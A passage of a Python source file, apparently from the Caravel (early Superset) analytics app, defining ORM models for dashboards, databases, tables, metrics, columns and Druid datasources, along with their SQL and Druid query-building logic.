'dashboard_user', Model.metadata,
Column('id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('ab_user.id')),
Column('dashboard_id', Integer, ForeignKey('dashboards.id'))
)
class Dashboard(Model, AuditMixinNullable):
"""The dashboard object!"""
__tablename__ = 'dashboards'
id = Column(Integer, primary_key=True)
dashboard_title = Column(String(500))
position_json = Column(Text)
description = Column(Text)
css = Column(Text)
json_metadata = Column(Text)
slug = Column(String(255), unique=True)
slices = relationship(
'Slice', secondary=dashboard_slices, backref='dashboards')
owners = relationship("User", secondary=dashboard_user)
def __repr__(self):
return self.dashboard_title
@property
def table_names(self):
return ", ".join({"{}".format(s.datasource) for s in self.slices})
@property
def url(self):
return "/caravel/dashboard/{}/".format(self.slug or self.id)
@property
def metadata_dejson(self):
if self.json_metadata:
return json.loads(self.json_metadata)
else:
return {}
def dashboard_link(self):
return '<a href="{obj.url}">{obj.dashboard_title}</a>'.format(obj=self)
@property
def json_data(self):
d = {
'id': self.id,
'metadata': self.metadata_dejson,
'dashboard_title': self.dashboard_title,
'slug': self.slug,
'slices': [slc.data for slc in self.slices],
'position_json': json.loads(self.position_json) if self.position_json else [],
}
return json.dumps(d)
class Queryable(object):
"""A common interface to objects that are queryable (tables and datasources)"""
@property
def column_names(self):
return sorted([c.column_name for c in self.columns])
@property
def main_dttm_col(self):
return "timestamp"
@property
def groupby_column_names(self):
return sorted([c.column_name for c in self.columns if c.groupby])
@property
def filterable_column_names(self):
return sorted([c.column_name for c in self.columns if c.filterable])
@property
def dttm_cols(self):
return []
@property
def url(self):
return '/{}/edit/{}'.format(self.baselink, self.id)
@property
def explore_url(self):
if self.default_endpoint:
return self.default_endpoint
else:
return "/caravel/explore/{obj.type}/{obj.id}/".format(obj=self)
class Database(Model, AuditMixinNullable):
"""An ORM object that stores Database related information"""
__tablename__ = 'dbs'
id = Column(Integer, primary_key=True)
database_name = Column(String(250), unique=True)
sqlalchemy_uri = Column(String(1024))
password = Column(EncryptedType(String(1024), config.get('SECRET_KEY')))
cache_timeout = Column(Integer)
extra = Column(Text, default=textwrap.dedent("""\
{
"metadata_params": {},
"engine_params": {}
}
"""))
def __repr__(self):
return self.database_name
def get_sqla_engine(self):
extra = self.get_extra()
params = extra.get('engine_params', {})
return create_engine(self.sqlalchemy_uri_decrypted, **params)
def safe_sqlalchemy_uri(self):
return self.sqlalchemy_uri
def grains(self):
"""Defines time granularity database-specific expressions.
The idea here is to make it easy for users to change the time grain
        from a datetime (maybe the source grain is arbitrary timestamps, daily
or 5 minutes increments) to another, "truncated" datetime. Since
each database has slightly different but similar datetime functions,
this allows a mapping between database engines and actual functions.
"""
Grain = namedtuple('Grain', 'name label function')
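        # Illustrative example (the column name 'ds' is hypothetical): with
        # the 'postgresql' mapping below, the 'day' grain renders as
        #   "DATE_TRUNC('day', {col})".format(col='ds')  ->  "DATE_TRUNC('day', ds)"
        # The engine is picked further down by matching the start of
        # self.sqlalchemy_uri against the dictionary keys.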
db_time_grains = {
'presto': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain('second', _('second'),
"date_trunc('second', CAST({col} AS TIMESTAMP))"),
Grain('minute', _('minute'),
"date_trunc('minute', CAST({col} AS TIMESTAMP))"),
Grain('hour', _('hour'),
"date_trunc('hour', CAST({col} AS TIMESTAMP))"),
Grain('day', _('day'),
"date_trunc('day', CAST({col} AS TIMESTAMP))"),
Grain('week', _('week'),
"date_trunc('week', CAST({col} AS TIMESTAMP))"),
Grain('month', _('month'),
"date_trunc('month', CAST({col} AS TIMESTAMP))"),
Grain('quarter', _('quarter'),
"date_trunc('quarter', CAST({col} AS TIMESTAMP))"),
Grain("week_ending_saturday", _('week_ending_saturday'),
"date_add('day', 5, date_trunc('week', date_add('day', 1, "
"CAST({col} AS TIMESTAMP))))"),
Grain("week_start_sunday", _('week_start_sunday'),
"date_add('day', -1, date_trunc('week', "
"date_add('day', 1, CAST({col} AS TIMESTAMP))))"),
),
'mysql': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain("second", _('second'), "DATE_ADD(DATE({col}), "
"INTERVAL (HOUR({col})*60*60 + MINUTE({col})*60"
" + SECOND({col})) SECOND)"),
Grain("minute", _('minute'), "DATE_ADD(DATE({col}), "
"INTERVAL (HOUR({col})*60 + MINUTE({col})) MINUTE)"),
Grain("hour", _('hour'), "DATE_ADD(DATE({col}), "
"INTERVAL HOUR({col}) HOUR)"),
Grain('day', _('day'), 'DATE({col})'),
Grain("week", _('week'), "DATE(DATE_SUB({col}, "
"INTERVAL DAYOFWEEK({col}) - 1 DAY))"),
Grain("month", _('month'), "DATE(DATE_SUB({col}, "
"INTERVAL DAYOFMONTH({col}) - 1 DAY))"),
),
'sqlite': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain('day', _('day'), 'DATE({col})'),
Grain("week", _('week'),
"DATE({col}, -strftime('%w', {col}) || ' days')"),
Grain("month", _('month'),
"DATE({col}, -strftime('%d', {col}) || ' days')"),
),
'postgresql': (
Grain("Time Column", _('Time Column'), "{col}"),
Grain("second", _('second'), "DATE_TRUNC('second', {col})"),
Grain("minute", _('minute'), "DATE_TRUNC('minute', {col})"),
Grain("hour", _('hour'), "DATE_TRUNC('hour', {col})"),
Grain("day", _('day'), "DATE_TRUNC('day', {col})"),
Grain("week", _('week'), "DATE_TRUNC('week', {col})"),
Grain("month", _('month'), "DATE_TRUNC('month', {col})"),
Grain("year", _('year'), "DATE_TRUNC('year', {col})"),
),
}
db_time_grains['redshift'] = db_time_grains['postgresql']
db_time_grains['vertica'] = db_time_grains['postgresql']
for db_type, grains in db_time_grains.items():
if self.sqlalchemy_uri.startswith(db_type):
return grains
def grains_dict(self):
return {grain.name: grain for grain in self.grains()}
def get_extra(self):
extra = {}
if self.extra:
try:
extra = json.loads(self.extra)
except Exception as e:
logging.error(e)
return extra
def get_table(self, table_name, schema=None):
extra = self.get_extra()
meta = MetaData(**extra.get('metadata_params', {}))
return Table(
table_name, meta,
schema=schema or None,
autoload=True,
autoload_with=self.get_sqla_engine())
def get_columns(self, table_name):
engine = self.get_sqla_engine()
insp = reflection.Inspector.from_engine(engine)
return insp.get_columns(table_name)
@property
def sqlalchemy_uri_decrypted(self):
conn = sqla.engine.url.make_url(self.sqlalchemy_uri)
conn.password = self.password
return str(conn)
@property
def sql_url(self):
return '/caravel/sql/{}/'.format(self.id)
@property
def sql_link(self):
return '<a href="{}">SQL</a>'.format(self.sql_url)
@property
def perm(self):
return (
"[{obj.database_name}].(id:{obj.id})").format(obj=self)
class SqlaTable(Model, Queryable, AuditMixinNullable):
"""An ORM object for SqlAlchemy table references"""
type = "table"
__tablename__ = 'tables'
id = Column(Integer, primary_key=True)
table_name = Column(String(250))
main_dttm_col = Column(String(250))
description = Column(Text)
default_endpoint = Column(Text)
database_id = Column(Integer, ForeignKey('dbs.id'), nullable=False)
is_featured = Column(Boolean, default=False)
user_id = Column(Integer, ForeignKey('ab_user.id'))
owner = relationship('User', backref='tables', foreign_keys=[user_id])
database = relationship(
'Database', backref='tables', foreign_keys=[database_id])
offset = Column(Integer, default=0)
cache_timeout = Column(Integer)
schema = Column(String(255))
table_columns = relationship("TableColumn", back_populates="table")
baselink = "tablemodelview"
__table_args__ = (
sqla.UniqueConstraint(
'database_id', 'schema', 'table_name',
name='_customer_location_uc'),)
def __repr__(self):
return self.table_name
@property
def description_markeddown(self):
return utils.markdown(self.description)
@property
def link(self):
return '<a href="{self.url}">{self.table_name}</a>'.format(**locals())
@property
def perm(self):
return (
"[{obj.database}].[{obj.table_name}]"
"(id:{obj.id})").format(obj=self)
@property
def full_name(self):
return "[{obj.database}].[{obj.table_name}]".format(obj=self)
@property
def dttm_cols(self):
l = [c.column_name for c in self.columns if c.is_dttm]
if self.main_dttm_col not in l:
l.append(self.main_dttm_col)
return l
@property
def num_cols(self):
return [c.column_name for c in self.columns if c.isnum]
@property
def any_dttm_col(self):
cols = self.dttm_cols
if cols:
return cols[0]
@property
def html(self):
t = ((c.column_name, c.type) for c in self.columns)
df = pd.DataFrame(t)
df.columns = ['field', 'type']
return df.to_html(
index=False,
classes=(
"dataframe table table-striped table-bordered "
"table-condensed"))
@property
def name(self):
return self.table_name
@renders('table_name')
def table_link(self):
return '<a href="{obj.explore_url}">{obj.table_name}</a>'.format(obj=self)
@property
def metrics_combo(self):
return sorted(
[
(m.metric_name, m.verbose_name or m.metric_name)
for m in self.metrics],
key=lambda x: x[1])
@property
def sql_url(self):
return self.database.sql_url + "?table_name=" + str(self.table_name)
@property
def sql_link(self):
return '<a href="{}">SQL</a>'.format(self.sql_url)
def get_col(self, col_name):
columns = self.table_columns
for col in columns:
if col_name == col.column_name:
return col
def query( # sqla
self, groupby, metrics,
granularity,
from_dttm, to_dttm,
filter=None, # noqa
is_timeseries=True,
timeseries_limit=15, row_limit=None,
inner_from_dttm=None, inner_to_dttm=None,
orderby=None,
extras=None,
columns=None):
"""Querying any sqla table from this common interface"""
# For backward compatibility
if granularity not in self.dttm_cols:
granularity = self.main_dttm_col
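        # Illustrative call (argument values are hypothetical):
        #   tbl.query(groupby=['gender'], metrics=['sum__num'], granularity='ds',
        #             from_dttm=start, to_dttm=end,
        #             filter=[('gender', 'in', 'girl,boy')], extras={})
        # returns a QueryResult carrying the dataframe, the duration and the SQL.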
cols = {col.column_name: col for col in self.columns}
metrics_dict = {m.metric_name: m for m in self.metrics}
qry_start_dttm = datetime.now()
if not granularity and is_timeseries:
            raise Exception(_(
                "Datetime column not provided as part of the table "
                "configuration and is required by this type of chart"))
metrics_exprs = [metrics_dict.get(m).sqla_col for m in metrics]
if metrics:
main_metric_expr = metrics_exprs[0]
else:
main_metric_expr = literal_column("COUNT(*)").label("ccount")
select_exprs = []
groupby_exprs = []
if groupby:
select_exprs = []
inner_select_exprs = []
inner_groupby_exprs = []
for s in groupby:
col = cols[s]
outer = col.sqla_col
inner = col.sqla_col.label(col.column_name + '__')
groupby_exprs.append(outer)
select_exprs.append(outer)
inner_groupby_exprs.append(inner)
inner_select_exprs.append(inner)
elif columns:
for s in columns:
select_exprs.append(cols[s].sqla_col)
metrics_exprs = []
if granularity:
dttm_col = cols[granularity]
dttm_expr = dttm_col.sqla_col.label('timestamp')
timestamp = dttm_expr
# Transforming time grain into an expression based on configuration
time_grain_sqla = extras.get('time_grain_sqla')
if time_grain_sqla:
                # unknown grains fall back to the raw timestamp column
                grain = self.database.grains_dict().get(time_grain_sqla)
                timestamp_grain = literal_column(grain.function.format(
                    col=dttm_expr)).label('timestamp') if grain else timestamp
else:
timestamp_grain = timestamp
if is_timeseries:
select_exprs += [timestamp_grain]
groupby_exprs += [timestamp_grain]
outer_from = text(dttm_col.dttm_sql_literal(from_dttm))
outer_to = text(dttm_col.dttm_sql_literal(to_dttm))
time_filter = [
timestamp >= outer_from,
timestamp <= outer_to,
]
inner_time_filter = copy(time_filter)
if inner_from_dttm:
inner_time_filter[0] = timestamp >= text(
dttm_col.dttm_sql_literal(inner_from_dttm))
if inner_to_dttm:
inner_time_filter[1] = timestamp <= text(
dttm_col.dttm_sql_literal(inner_to_dttm))
else:
inner_time_filter = []
select_exprs += metrics_exprs
qry = select(select_exprs)
tbl = table(self.table_name)
if self.schema:
tbl.schema = self.schema
if not columns:
qry = qry.group_by(*groupby_exprs)
where_clause_and = []
having_clause_and = []
for col, op, eq in filter:
col_obj = cols[col]
if op in ('in', 'not in'):
values = eq.split(",")
cond = col_obj.sqla_col.in_(values)
if op == 'not in':
cond = ~cond
where_clause_and.append(cond)
if extras and 'where' in extras:
where_clause_and += [text(extras['where'])]
if extras and 'having' in extras:
having_clause_and += [text(extras['having'])]
if granularity:
qry = qry.where(and_(*(time_filter + where_clause_and)))
else:
qry = qry.where(and_(*where_clause_and))
qry = qry.having(and_(*having_clause_and))
if groupby:
qry = qry.order_by(desc(main_metric_expr))
elif orderby:
for col, ascending in orderby:
direction = asc if ascending else desc
qry = qry.order_by(direction(col))
qry = qry.limit(row_limit)
if timeseries_limit and groupby:
            # some SQL dialects require order by expressions
# to also be in the select clause
inner_select_exprs += [main_metric_expr]
subq = select(inner_select_exprs)
subq = subq.select_from(tbl)
subq = subq.where(and_(*(where_clause_and + inner_time_filter)))
subq = subq.group_by(*inner_groupby_exprs)
subq = subq.order_by(desc(main_metric_expr))
subq = subq.limit(timeseries_limit)
on_clause = []
for i, gb in enumerate(groupby):
on_clause.append(
groupby_exprs[i] == column(gb + '__'))
tbl = tbl.join(subq.alias(), and_(*on_clause))
qry = qry.select_from(tbl)
engine = self.database.get_sqla_engine()
sql = "{}".format(
qry.compile(
engine, compile_kwargs={"literal_binds": True},),
)
df = pd.read_sql_query(
sql=sql,
con=engine
)
sql = sqlparse.format(sql, reindent=True)
return QueryResult(
df=df, duration=datetime.now() - qry_start_dttm, query=sql)
def fetch_metadata(self):
"""Fetches the metadata for the table and merges it in"""
try:
table = self.database.get_table(self.table_name, schema=self.schema)
except Exception as e:
flasher(str(e))
flasher(
"Table doesn't seem to exist in the specified database, "
"couldn't fetch column information", "danger")
return
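        # From here on the reflected table is merged in: TableColumn rows are
        # created or updated and sum__/max__/min__/count_distinct__ metrics
        # (plus a global COUNT(*) metric) are generated for eligible columns.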
TC = TableColumn # noqa shortcut to class
M = SqlMetric # noqa
metrics = []
any_date_col = None
for col in table.columns:
try:
datatype = "{}".format(col.type).upper()
except Exception as e:
datatype = "UNKNOWN"
logging.error(
"Unrecognized data type in {}.{}".format(table, col.name))
logging.exception(e)
dbcol = (
db.session
.query(TC)
.filter(TC.table == self)
.filter(TC.column_name == col.name)
.first()
)
db.session.flush()
if not dbcol:
dbcol = TableColumn(column_name=col.name, type=datatype)
dbcol.groupby = dbcol.is_string
dbcol.filterable = dbcol.is_string
dbcol.sum = dbcol.isnum
dbcol.is_dttm = dbcol.is_time
db.session.merge(self)
self.columns.append(dbcol)
if not any_date_col and dbcol.is_time:
any_date_col = col.name
quoted = "{}".format(
column(dbcol.column_name).compile(dialect=db.engine.dialect))
if dbcol.sum:
metrics.append(M(
metric_name='sum__' + dbcol.column_name,
verbose_name='sum__' + dbcol.column_name,
metric_type='sum',
expression="SUM({})".format(quoted)
))
if dbcol.max:
metrics.append(M(
metric_name='max__' + dbcol.column_name,
verbose_name='max__' + dbcol.column_name,
metric_type='max',
expression="MAX({})".format(quoted)
))
if dbcol.min:
metrics.append(M(
metric_name='min__' + dbcol.column_name,
verbose_name='min__' + dbcol.column_name,
metric_type='min',
expression="MIN({})".format(quoted)
))
if dbcol.count_distinct:
metrics.append(M(
metric_name='count_distinct__' + dbcol.column_name,
verbose_name='count_distinct__' + dbcol.column_name,
metric_type='count_distinct',
expression="COUNT(DISTINCT {})".format(quoted)
))
dbcol.type = datatype
db.session.merge(self)
db.session.commit()
metrics.append(M(
metric_name='count',
verbose_name='COUNT(*)',
metric_type='count',
expression="COUNT(*)"
))
for metric in metrics:
m = (
db.session.query(M)
.filter(M.metric_name == metric.metric_name)
.filter(M.table_id == self.id)
.first()
)
metric.table_id = self.id
if not m:
db.session.add(metric)
db.session.commit()
if not self.main_dttm_col:
self.main_dttm_col = any_date_col
class SqlMetric(Model, AuditMixinNullable):
"""ORM object for metrics, each table can have multiple metrics"""
__tablename__ = 'sql_metrics'
id = Column(Integer, primary_key=True)
metric_name = Column(String(512))
verbose_name = Column(String(1024))
metric_type = Column(String(32))
table_id = Column(Integer, ForeignKey('tables.id'))
table = relationship(
'SqlaTable', backref='metrics', foreign_keys=[table_id])
expression = Column(Text)
description = Column(Text)
is_restricted = Column(Boolean, default=False, nullable=True)
d3format = Column(String(128))
@property
def sqla_col(self):
name = self.metric_name
return literal_column(self.expression).label(name)
@property
def perm(self):
return (
"{parent_name}.[{obj.metric_name}](id:{obj.id})"
).format(obj=self,
parent_name=self.table.full_name) if self.table else None
class TableColumn(Model, AuditMixinNullable):
"""ORM object for table columns, each table can have multiple columns"""
__tablename__ = 'table_columns'
id = Column(Integer, primary_key=True)
table_id = Column(Integer, ForeignKey('tables.id'))
table = relationship(
'SqlaTable', backref='columns', foreign_keys=[table_id])
column_name = Column(String(255))
verbose_name = Column(String(1024))
is_dttm = Column(Boolean, default=False)
is_active = Column(Boolean, default=True)
type = Column(String(32), default='')
groupby = Column(Boolean, default=False)
count_distinct = Column(Boolean, default=False)
sum = Column(Boolean, default=False)
max = Column(Boolean, default=False)
min = Column(Boolean, default=False)
filterable = Column(Boolean, default=False)
expression = Column(Text, default='')
description = Column(Text, default='')
python_date_format = Column(String(255))
database_expression = Column(String(255))
num_types = ('DOUBLE', 'FLOAT', 'INT', 'BIGINT', 'LONG')
date_types = ('DATE', 'TIME')
str_types = ('VARCHAR', 'STRING', 'CHAR')
def __repr__(self):
return self.column_name
@property
def isnum(self):
return any([t in self.type.upper() for t in self.num_types])
@property
def is_time(self):
return any([t in self.type.upper() for t in self.date_types])
@property
def is_string(self):
return any([t in self.type.upper() for t in self.str_types])
@property
def sqla_col(self):
name = self.column_name
if not self.expression:
col = column(self.column_name).label(name)
else:
col = literal_column(self.expression).label(name)
return col
    def dttm_sql_literal(self, dttm):
        """Convert a datetime object to a SQL literal string
        If database_expression is empty, the datetime is formatted
        using the pattern the user provided (python_date_format).
        If database_expression is set, the datetime is interpolated into
        that SQL expression so the database performs the conversion.
"""
tf = self.python_date_format or '%Y-%m-%d %H:%M:%S.%f'
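        # e.g. 'epoch_s' renders the number of seconds since 1970-01-01,
        # 'epoch_ms' milliseconds, and the default renders a quoted datetime
        # string, with engine-specific overrides in the dict below.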
if self.database_expression:
return self.database_expression.format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
elif tf == 'epoch_s':
return str((dttm - datetime(1970, 1, 1)).total_seconds())
elif tf == 'epoch_ms':
return str((dttm - datetime(1970, 1, 1)).total_seconds()*1000.0)
else:
default = "'{}'".format(dttm.strftime(tf))
iso = dttm.isoformat()
d = {
'mssql': "CONVERT(DATETIME, '{}', 126)".format(iso), # untested
'mysql': default,
'oracle':
"""TO_TIMESTAMP('{}', 'YYYY-MM-DD"T"HH24:MI:SS.ff6')""".format(
dttm.isoformat()),
'presto': default,
'sqlite': default,
}
for k, v in d.items():
if self.table.database.sqlalchemy_uri.startswith(k):
return v
return default
class DruidCluster(Model, AuditMixinNullable):
"""ORM object referencing the Druid clusters"""
__tablename__ = 'clusters'
id = Column(Integer, primary_key=True)
cluster_name = Column(String(250), unique=True)
coordinator_host = Column(String(255))
coordinator_port = Column(Integer)
coordinator_endpoint = Column(
String(255), default='druid/coordinator/v1/metadata')
broker_host = Column(String(255))
broker_port = Column(Integer)
broker_endpoint = Column(String(255), default='druid/v2')
metadata_last_refreshed = Column(DateTime)
def __repr__(self):
return self.cluster_name
def get_pydruid_client(self):
cli = PyDruid(
"http://{0}:{1}/".format(self.broker_host, self.broker_port),
self.broker_endpoint)
return cli
def get_datasources(self):
endpoint = (
"http://{obj.coordinator_host}:{obj.coordinator_port}/"
"{obj.coordinator_endpoint}/datasources"
).format(obj=self)
return json.loads(requests.get(endpoint).text)
def get_druid_version(self):
endpoint = (
"http://{obj.coordinator_host}:{obj.coordinator_port}/status"
).format(obj=self)
return json.loads(requests.get(endpoint).text)['version']
def refresh_datasources(self):
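        """Refresh the stored Druid version and sync all non-blacklisted datasources to the db"""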
self.druid_version = self.get_druid_version()
for datasource in self.get_datasources():
if datasource not in config.get('DRUID_DATA_SOURCE_BLACKLIST'):
DruidDatasource.sync_to_db(datasource, self)
class DruidDatasource(Model, AuditMixinNullable, Queryable):
"""ORM object referencing Druid datasources (tables)"""
type = "druid"
baselink = "druiddatasourcemodelview"
__tablename__ = 'datasources'
id = Column(Integer, primary_key=True)
datasource_name = Column(String(255), unique=True)
is_featured = Column(Boolean, default=False)
is_hidden = Column(Boolean, default=False)
description = Column(Text)
default_endpoint = Column(Text)
user_id = Column(Integer, ForeignKey('ab_user.id'))
owner = relationship('User', backref='datasources', foreign_keys=[user_id])
cluster_name = Column(
String(250), ForeignKey('clusters.cluster_name'))
cluster = relationship(
'DruidCluster', backref='datasources', foreign_keys=[cluster_name])
offset = Column(Integer, default=0)
cache_timeout = Column(Integer)
@property
def metrics_combo(self):
return sorted(
[(m.metric_name, m.verbose_name) for m in self.metrics],
key=lambda x: x[1])
@property
def num_cols(self):
return [c.column_name for c in self.columns if c.isnum]
@property
def name(self):
return self.datasource_name
@property
def perm(self):
return (
"[{obj.cluster_name}].[{obj.datasource_name}]"
"(id:{obj.id})").format(obj=self)
@property
def link(self):
return (
'<a href="{self.url}">'
'{self.datasource_name}</a>').format(**locals())
@property
def full_name(self):
return (
"[{obj.cluster_name}]."
"[{obj.datasource_name}]").format(obj=self)
def __repr__(self):
return self.datasource_name
@renders('datasource_name')
def datasource_link(self):
url = "/caravel/explore/{obj.type}/{obj.id}/".format(obj=self)
return '<a href="{url}">{obj.datasource_name}</a>'.format(
url=url, obj=self)
def get_metric_obj(self, metric_name):
return [
m.json_obj for m in self.metrics
if m.metric_name == metric_name
][0]
@staticmethod
    def version_higher(v1, v2):
        """Is v1 strictly higher than v2?
>>> DruidDatasource.version_higher('0.8.2', '0.9.1')
False
>>> DruidDatasource.version_higher('0.8.2', '0.6.1')
True
>>> DruidDatasource.version_higher('0.8.2', '0.8.2')
False
>>> DruidDatasource.version_higher('0.8.2', '0.9.BETA')
False
>>> DruidDatasource.version_higher('0.8.2', '0.9')
False
"""
def int_or_0(v):
try:
v = int(v)
except (TypeError, ValueError):
v = 0
return v
v1nums = [int_or_0(n) for n in v1.split('.')]
v2nums = [int_or_0(n) for n in v2.split('.')]
v1nums = (v1nums + [0, 0, 0])[:3]
v2nums = (v2nums + [0, 0, 0])[:3]
return v1nums[0] > v2nums[0] or \
(v1nums[0] == v2nums[0] and v1nums[1] > v2nums[1]) or \
(v1nums[0] == v2nums[0] and v1nums[1] == v2nums[1] and v1nums[2] > v2nums[2])
def latest_metadata(self):
"""Returns segment metadata from the latest segment"""
client = self.cluster.get_pydruid_client()
results = client.time_boundary(datasource=self.datasource_name)
if not results:
return
max_time = results[0]['result']['maxTime']
max_time = parse(max_time)
        # Query segmentMetadata for the last 7 days. On Druid versions up to
        # 0.8.2 the interval has to end more than 1 day ago to exclude
        # realtime segments, which triggered a bug (fixed in druid 0.8.2).
# https://groups.google.com/forum/#!topic/druid-user/gVCqqspHqOQ
start = (0 if self.version_higher(self.cluster.druid_version, '0.8.2') else 1)
intervals = (max_time - timedelta(days=7)).isoformat() + '/'
intervals += (max_time - timedelta(days=start)).isoformat()
segment_metadata = client.segment_metadata(
datasource=self.datasource_name,
intervals=intervals)
if segment_metadata:
return segment_metadata[-1]['columns']
def generate_metrics(self):
for col in self.columns:
col.generate_metrics()
@classmethod
    def sync_to_db(cls, name, cluster):
        """Fetches metadata for the datasource and merges it into the Caravel db"""
logging.info("Syncing Druid datasource [{}]".format(name))
session = get_session()
datasource = session.query(cls).filter_by(datasource_name=name).first()
if not datasource:
datasource = cls(datasource_name=name)
session.add(datasource)
flasher("Adding new datasource [{}]".format(name), "success")
else:
flasher("Refreshing datasource [{}]".format(name), "info")
session.flush()
datasource.cluster = cluster
session.flush()
cols = datasource.latest_metadata()
if not cols:
return
for col in cols:
col_obj = (
session
.query(DruidColumn)
.filter_by(datasource_name=name, column_name=col)
.first()
)
datatype = cols[col]['type']
if not col_obj:
col_obj = DruidColumn(datasource_name=name, column_name=col)
session.add(col_obj)
if datatype == "STRING":
col_obj.groupby = True
col_obj.filterable = True
if datatype == "hyperUnique" or datatype == "thetaSketch":
col_obj.count_distinct = True
if col_obj:
col_obj.type = cols[col]['type']
session.flush()
col_obj.datasource = datasource
col_obj.generate_metrics()
session.flush()
def query( # druid
self, groupby, metrics,
granularity,
from_dttm, to_dttm,
filter=None, # noqa
is_timeseries=True,
timeseries_limit=None,
row_limit=None,
inner_from_dttm=None, inner_to_dttm=None,
orderby=None,
extras=None, # noqa
select=None, # noqa
columns=None, ):
"""Runs a query against Druid and returns a dataframe.
This query interface is common to SqlAlchemy and Druid
"""
# TODO refactor into using a TBD Query object
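        # Rough flow: build aggregations/post-aggregations from the metric
        # definitions, optionally run a "phase one" groupby to keep only the
        # top timeseries, then run the main groupby query, export the result
        # to pandas and reorder the columns.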
qry_start_dttm = datetime.now()
inner_from_dttm = inner_from_dttm or from_dttm
inner_to_dttm = inner_to_dttm or to_dttm
# add tzinfo to native datetime with config
from_dttm = from_dttm.replace(tzinfo=config.get("DRUID_TZ"))
to_dttm = to_dttm.replace(tzinfo=config.get("DRUID_TZ"))
query_str = ""
metrics_dict = {m.metric_name: m for m in self.metrics}
all_metrics = []
post_aggs = {}
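        # Collects the field names referenced by a post-aggregator definition,
        # descending recursively into nested 'arithmetic' aggregators.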
def recursive_get_fields(_conf):
_fields = _conf.get('fields', [])
field_names = []
for _f in _fields:
_type = _f.get('type')
if _type in ['fieldAccess', 'hyperUniqueCardinality']:
field_names.append(_f.get('fieldName'))
elif _type == 'arithmetic':
field_names += recursive_get_fields(_f)
return list(set(field_names))
for metric_name in metrics:
metric = metrics_dict[metric_name]
if metric.metric_type != 'postagg':
all_metrics.append(metric_name)
else:
conf = metric.json_obj
all_metrics += recursive_get_fields(conf)
all_metrics += conf.get('fieldNames', [])
if conf.get('type') == 'javascript':
post_aggs[metric_name] = JavascriptPostAggregator(
name=conf.get('name'),
field_names=conf.get('fieldNames'),
function=conf.get('function'))
else:
post_aggs[metric_name] = Postaggregator(
conf.get('fn', "/"),
conf.get('fields', []),
conf.get('name', ''))
aggregations = {
m.metric_name: m.json_obj
for m in self.metrics
if m.metric_name in all_metrics
}
rejected_metrics = [
m.metric_name for m in self.metrics
if m.is_restricted and
m.metric_name in aggregations.keys() and
not sm.has_access('metric_access', m.perm)
]
if rejected_metrics:
raise MetricPermException(
"Access to the metrics denied: " + ', '.join(rejected_metrics)
)
granularity = granularity or "all"
if granularity != "all":
granularity = utils.parse_human_timedelta(
granularity).total_seconds() * 1000
if not isinstance(granularity, string_types):
granularity = {"type": "duration", "duration": granularity}
origin = extras.get('druid_time_origin')
if origin:
dttm = utils.parse_human_datetime(origin)
granularity['origin'] = dttm.isoformat()
qry = dict(
datasource=self.datasource_name,
dimensions=groupby,
aggregations=aggregations,
granularity=granularity,
post_aggregations=post_aggs,
intervals=from_dttm.isoformat() + '/' + to_dttm.isoformat(),
)
filters = self.get_filters(filter)
if filters:
qry['filter'] = filters
having_filters = self.get_having_filters(extras.get('having_druid'))
if having_filters:
qry['having'] = having_filters
client = self.cluster.get_pydruid_client()
orig_filters = filters
if timeseries_limit and is_timeseries:
            # Limit on the number of timeseries, doing a two-phase query
pre_qry = deepcopy(qry)
pre_qry['granularity'] = "all"
pre_qry['limit_spec'] = {
"type": "default",
"limit": timeseries_limit,
'intervals': (
inner_from_dttm.isoformat() + '/' +
inner_to_dttm.isoformat()),
"columns": [{
"dimension": metrics[0] if metrics else self.metrics[0],
"direction": "descending",
}],
}
client.groupby(**pre_qry)
query_str += "// Two phase query\n// Phase 1\n"
query_str += json.dumps(
client.query_builder.last_query.query_dict, indent=2) + "\n"
            query_str += "// Phase 2 (built based on phase one's results)\n"
df = client.export_pandas()
if df is not None and not df.empty:
dims = qry['dimensions']
filters = []
for unused, row in df.iterrows():
fields = []
for dim in dims:
f = Dimension(dim) == row[dim]
fields.append(f)
if len(fields) > 1:
filt = Filter(type="and", fields=fields)
filters.append(filt)
elif fields:
filters.append(fields[0])
if filters:
ff = Filter(type="or", fields=filters)
if not orig_filters:
qry['filter'] = ff
else:
qry['filter'] = Filter(type="and", fields=[
ff,
orig_filters])
qry['limit_spec'] = None
if row_limit:
qry['limit_spec'] = {
"type": "default",
"limit": row_limit,
"columns": [{
"dimension": metrics[0] if metrics else self.metrics[0],
"direction": "descending",
}],
}
client.groupby(**qry)
query_str += json.dumps(
client.query_builder.last_query.query_dict, indent=2)
df = client.export_pandas()
if df is None or df.size == 0:
raise Exception(_("No data was returned."))
if (
not is_timeseries and
granularity == "all" and
'timestamp' in df.columns):
del df['timestamp']
# Reordering columns
cols = []
if 'timestamp' in df.columns:
cols += ['timestamp']
cols += [col for col in groupby if col in df.columns]
cols += [col for col in metrics if col in df.columns]
df = df[cols]
return QueryResult(
df=df,
query=query_str,
duration=datetime.now() - qry_start_dttm)
@staticmethod
def get_filters(raw_filters):
filters = None
        for col, op, eq in (raw_filters or []):
cond = None
if op == '==':
cond = Dimension(col) == eq
elif op == '!=':
cond = ~(Dimension(col) == eq)
elif op in ('in', 'not in'):
fields = []
splitted = eq.split(',')
if len(splitted) > 1:
                    for s in splitted:
s = s.strip()
fields.append(Dimension(col) == s)
cond = Filter(type="or", fields=fields)
else:
cond = Dimension(col) == eq
if op == 'not in':
cond = ~cond
elif op == 'regex':
cond = Filter(type="regex", pattern=eq, dimension=col)
if filters:
filters = Filter(type="and", fields=[
cond,
filters
])
else:
filters = cond
return filters
def _get_having_obj(self, col, op, eq):
cond = None
if op == '==':
if col in self.column_names:
cond = DimSelector(dimension=col, value=eq)
else:
cond = Aggregation(col) == eq
elif op == '>':
cond = Aggregation(col) > eq
elif op == '<':
cond = Aggregation(col) < eq
return cond
def get_having_filters(self, raw_filters):
filters = None
reversed_op_map = {
'!=': '==',
'>=': '<',
'<=': '>'
}
        for col, op, eq in (raw_filters or []):
cond = None
if op in ['==', '>', '<']:
cond = self._get_having_obj(col, op, eq)
elif op in reversed_op_map:
cond = ~self._get_having_obj(col, reversed_op_map[op], eq)
if filters:
filters = filters & cond
else:
filters = cond
return filters
class Log(Model):
"""ORM object used to log Caravel actions to the database"""
__tablename__ = 'logs'
id = Column(Integer, primary_key=True)
action = Column(String(512))
user_id = Column(Integer, ForeignKey('ab_user.id'))
dashboard_id = Column(Integer)
slice_id = Column(Integer)
json = Column(Text)
